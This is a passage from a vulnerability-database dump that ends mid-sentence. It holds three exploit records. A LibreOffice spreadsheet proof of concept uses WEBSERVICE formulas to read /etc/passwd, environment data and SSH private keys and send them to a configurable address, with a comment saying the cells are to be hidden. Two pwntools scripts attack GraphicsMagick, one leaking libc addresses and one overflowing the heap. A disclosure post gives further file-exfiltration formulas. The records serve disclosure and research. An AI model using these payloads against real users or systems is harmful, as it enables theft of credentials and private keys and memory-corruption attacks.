table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co3\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co5\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co6\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"8\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell table:number-columns-repeated=\"9\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro2\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Current user:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\" table:formula=\"of:=\"/home/\" & MID(COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")) + LEN(\"USER=\"); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"))-LEN(\"USER=\")) & \"/\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\":\"; [.F3]; [.E3])\" office:value-type=\"float\" office:value=\"689\" calcext:value-type=\"float\">\r\n <text:p>689</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\"/home\"; [.F3]; FIND(\":x:1000:1000:\"; [.F3]))\" office:value-type=\"float\" office:value=\"676\" calcext:value-type=\"float\">\r\n <text:p>676</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=COM.MICROSOFT.WEBSERVICE(\"/etc/passwd\")\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"><text:p>(change this)</text:p><text:p>Address:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>http://localhost:8080</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro3\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>List of private keys:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\"/>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & \"/.ssh/config\"); \"~\"; [.C3])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Send:</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>0 (default path)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.C3] & \"/.ssh/id_rsa\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"5\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C5]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"1\" calcext:value-type=\"float\">\r\n <text:p>1</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F6])\" office:value-type=\"float\" office:value=\"132\" calcext:value-type=\"float\">\r\n <text:p>132</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F6]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"109\" calcext:value-type=\"float\">\r\n <text:p>109</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.F4])\" office:value-type=\"float\" office:value=\"96\" calcext:value-type=\"float\">\r\n <text:p>96</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C6]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"2\" calcext:value-type=\"float\">\r\n <text:p>2</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F7])\" office:value-type=\"float\" office:value=\"297\" calcext:value-type=\"float\">\r\n <text:p>297</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F7]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"259\" calcext:value-type=\"float\">\r\n <text:p>259</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F6];1))\" office:value-type=\"float\" office:value=\"246\" calcext:value-type=\"float\">\r\n <text:p>246</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C7]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"3\" calcext:value-type=\"float\">\r\n <text:p>3</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F8])\" office:value-type=\"float\" office:value=\"436\" calcext:value-type=\"float\">\r\n <text:p>436</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F8]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"409\" calcext:value-type=\"float\">\r\n <text:p>409</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F7];1))\" office:value-type=\"float\" office:value=\"396\" calcext:value-type=\"float\">\r\n <text:p>396</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C8]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"4\" calcext:value-type=\"float\">\r\n <text:p>4</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F9])\" office:value-type=\"float\" office:value=\"586\" calcext:value-type=\"float\">\r\n <text:p>586</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F9]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"563\" calcext:value-type=\"float\">\r\n <text:p>563</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F8];1))\" office:value-type=\"float\" office:value=\"550\" calcext:value-type=\"float\">\r\n <text:p>550</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C9]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"5\" calcext:value-type=\"float\">\r\n <text:p>5</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F10])\" office:value-type=\"float\" office:value=\"718\" calcext:value-type=\"float\">\r\n <text:p>718</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F10]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"695\" calcext:value-type=\"float\">\r\n <text:p>695</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F9];1))\" office:value-type=\"float\" office:value=\"682\" calcext:value-type=\"float\">\r\n <text:p>682</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C10]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"6\" calcext:value-type=\"float\">\r\n <text:p>6</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F11])\" office:value-type=\"float\" office:value=\"882\" calcext:value-type=\"float\">\r\n <text:p>882</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F11]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"860\" calcext:value-type=\"float\">\r\n <text:p>860</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F10];1))\" office:value-type=\"float\" office:value=\"847\" calcext:value-type=\"float\">\r\n <text:p>847</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C11]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"7\" calcext:value-type=\"float\">\r\n <text:p>7</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F12])\" office:value-type=\"float\" office:value=\"1267\" calcext:value-type=\"float\">\r\n <text:p>1267</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F12]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1240\" calcext:value-type=\"float\">\r\n <text:p>1240</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F11];1))\" office:value-type=\"float\" office:value=\"1227\" calcext:value-type=\"float\">\r\n <text:p>1227</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C12]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"8\" calcext:value-type=\"float\">\r\n <text:p>8</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F13])\" office:value-type=\"float\" office:value=\"1408\" calcext:value-type=\"float\">\r\n <text:p>1408</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F13]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1383\" calcext:value-type=\"float\">\r\n <text:p>1383</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F12];1))\" office:value-type=\"float\" office:value=\"1370\" calcext:value-type=\"float\">\r\n <text:p>1370</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C13]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"9\" calcext:value-type=\"float\">\r\n <text:p>9</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F14])\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F14]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F13];1))\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C14]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n </table:table>\r\n <table:named-expressions/>\r\n </office:spreadsheet>\r\n </office:body>\r\n</office:document>\r\n```", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44022/"}, {"lastseen": "2017-11-03T20:31:35", "bulletinFamily": "exploit", "description": "GraphicsMagick - Memory Disclosure / Heap Overflow. CVE-2017-16352,CVE-2017-16353. Dos exploit for Multiple platform", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "id": "EDB-ID:43111", "href": "https://www.exploit-db.com/exploits/43111/", "type": "exploitdb", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n\r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n\r\nThe vulnerabilities found are:\r\n\r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n\r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n\r\n\r\nVulnerabilities details\r\n\r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n\r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n\r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n\r\nThe code which triggers the vulnerable code path is:\r\n\r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n\r\n\r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n\r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n\r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n\r\n\r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n\r\n\r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n\r\n\r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n\r\n\r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n\r\n\r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n\r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n\r\nProof of Concept\r\n\r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n\r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n\r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n\r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n\r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n\r\n\r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n\r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n\r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n\r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n\r\n\r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43111/"}], "packetstorm": [{"lastseen": "2018-02-15T00:22:34", "bulletinFamily": "exploit", "description": "", "modified": "2018-02-08T00:00:00", "published": "2018-02-08T00:00:00", "href": "https://packetstormsecurity.com/files/146319/LibreOffice-Arbitrary-File-Disclosure.html", "id": "PACKETSTORM:146319", "type": "packetstorm", "title": "LibreOffice Arbitrary File Disclosure", "sourceData": "`Hello, \n \nAfter I know that the reported vulnerability was already known to developers, \nbut they did not include trivial fix to 6.0, but (as the developer said, I did \nnot check it byself) include to 5.4.5 (it means this is a silent fixed \nvulnerability) with a month lag between updates I think it's more correct to \nfull disclose it. \n \nPoC: https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure \n \n# Vulnerability description \n \n## First part \n \nLibreOffice supports COM.MICROSOFT.WEBSERVICE function: \n \nhttps://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 \n \nThe function is required to obtain data by URL, usually used as: \n \n=FILTERXML(WEBSERVICE(\"http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric\");\"number(/weatherdata/forecast/time[2]/temperature/@value)\") \n \nIn original: \n \nFor protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value. \n \nIn LibreOffice, these restrictions are not implemented. \n \n## Second part \n \nBy default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document. \n \n# Exploitation \n \nTo read file you need just: \n \n=WEBSERVICE(\"/etc/passwd\") \n \nThis function can also be used to send a file: \n \n=WEBSERVICE(\"http://localhost:6000/?q=\" & WEBSERVICE(\"/etc/passwd\")) \n \nFor successful operation, you need to send the files of the current user, so you need to retrieve current user home path. \n \n=MID(WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")) + 5, SEARCH(CHAR(0), WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\", \n \nAlso you can parse other files too, like a ~/.ssh/config or something like that. \n \nFor other than LibreOffice Calc formats you just need embed calc object to other document (I checked it 